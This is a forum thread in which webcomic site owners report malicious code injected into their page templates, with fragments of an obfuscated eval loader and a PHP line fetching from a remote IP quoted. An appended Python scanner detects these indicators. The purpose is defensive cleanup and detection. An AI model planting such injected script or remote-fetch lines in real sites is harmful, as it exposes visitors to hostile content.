Annoying malicious code

Elaborate
Newbie
Posts: 6
Joined: Sat Mar 08, 2008 5:58 pm

Annoying malicious code

Post by Elaborate »

After getting warnings when loading my site
in Google Chrome for a couple of days
(something about "content from xuli-xuli.ipq.co" )
I checked the code, and found an unwanted script
inserted in the header of my indextemplate.html;
removing it resolved the problem.

Code:

try{function _X48e(){d=new String(",,``,``.,,`,,,

Anything defining strings like this is suspicious...

Code:

eval(r.substr(0,r.length-1));} _X48e();}catch(e){}

And ending with an "eval" is DEFINITELY suspicious...


What to do now, though?
Should I get myself a new FTP code (how?),
or did this attack go via some other route?
In any case, thought I'd better notify you...

-Roland
http://goldenage.comicgen.com

Elaborate
Newbie
Posts: 6
Joined: Sat Mar 08, 2008 5:58 pm

Re: Annoying malicious code

Post by Elaborate »

So this time, when I updated, I found THIS little gem in my dailytemplate:

Code:

<?php echo file_get_contents("http://91.193.192.27/users.txt"); ?>

I mean, I don't think php code WORKS on comicgen unless you've paid for it,
so it should be basically harmless - but it's annoying anyway.
So, is it just my account that's been hacked? Or have others had this problem, too?

Spaceprincess
Regular Poster
Posts: 754
Joined: Wed Sep 10, 2008 6:36 pm
Location: omicron persi i 8

Re: Annoying malicious code

Post by Spaceprincess »

Someone told me my site tripped their firewall security. I assumed it was just the banner ads, but if you're getting unwanted code added, maybe there is more going on.
I didn't see any bad code on mine, but I'm not sure what to look for.

Kisai
Goddess of Light
Posts: 3276
Joined: Fri Jan 01, 1999 4:00 pm
Location: The Past, the Present, The future

Re: Annoying malicious code

Post by Kisai »

Elaborate wrote:
So this time, when I updated, I found THIS little gem in my dailytemplate:

Code:

<?php echo file_get_contents("http://91.193.192.27/users.txt"); ?>

I mean, I don't think php code WORKS on comicgen unless you've paid for it,
so it should be basically harmless - but it's annoying anyway.
So, is it just my account that's been hacked? Or have others had this problem, too?

That's rather interesting. You're right, the PHP code is -not- supposed to work under normal circumstances, mainly because something like this could be done.

Delete that, and while you're at it, change your password to both your site and your email address (I make a habit of deleting password change emails), since those are the only two vectors that could have been done.
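
As an added example (not part of the thread and not ComicGenesis code), a small Python check that scans a template for the indicators quoted above: a punctuation-only string, a trailing eval inside an empty try/catch, and a PHP tag that fetches a remote URL. The rule names, the 0.8 threshold, and the sample template (with a documentation-range address) are constructed for illustration.

```python
import re

# Heuristics based on the indicators named in the thread; assumed, not exhaustive.
RULES = [
    ("eval-call", re.compile(r"\beval\s*\(")),
    ("empty-catch", re.compile(r"catch\s*\(\s*\w+\s*\)\s*\{\s*\}")),
    ("php-remote-fetch", re.compile(
        r"<\?php[^?]*\b(?:file_get_contents|include|require)\s*\(?\s*[\"']https?://",
        re.I)),
]
# A quote followed by 16+ characters; the closing quote is optional so that
# truncated or unterminated literals are still examined.
STRING_LITERAL = re.compile(r"\"([^\"\n]{16,})|'([^'\n]{16,})")


def punctuation_ratio(s):
    """Fraction of characters that are neither alphanumeric nor whitespace."""
    return sum(1 for c in s if not (c.isalnum() or c.isspace())) / len(s)


def scan_template(text):
    """Return (line_number, rule_name) pairs for every suspicious line."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        for name, rx in RULES:
            if rx.search(line):
                findings.append((n, name))
        for m in STRING_LITERAL.finditer(line):
            body = m.group(1) or m.group(2)
            if punctuation_ratio(body) > 0.8:  # assumed threshold
                findings.append((n, "punctuation-string"))
                break
    return findings


# Constructed sample: inert look-alike of the injected lines, not the real payload.
SAMPLE = '''<html><head><title>My Comic</title>
<script>try{function _Xa(){d=new String(",,``,``.,,`,,,``.`,,`.,,`");
eval(r.substr(0,r.length-1));} _Xa();}catch(e){}</script>
</head><body>
<img src="comics/20080308.png" alt="Today's comic, page twelve">
<?php echo file_get_contents("http://192.0.2.1/users.txt"); ?>
</body></html>'''

if __name__ == "__main__":
    for line_no, rule in scan_template(SAMPLE):
        print(f"line {line_no}: {rule}")
```

Run it over every template after each upload; any hit on a file you did not edit yourself means the file was changed by someone else.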
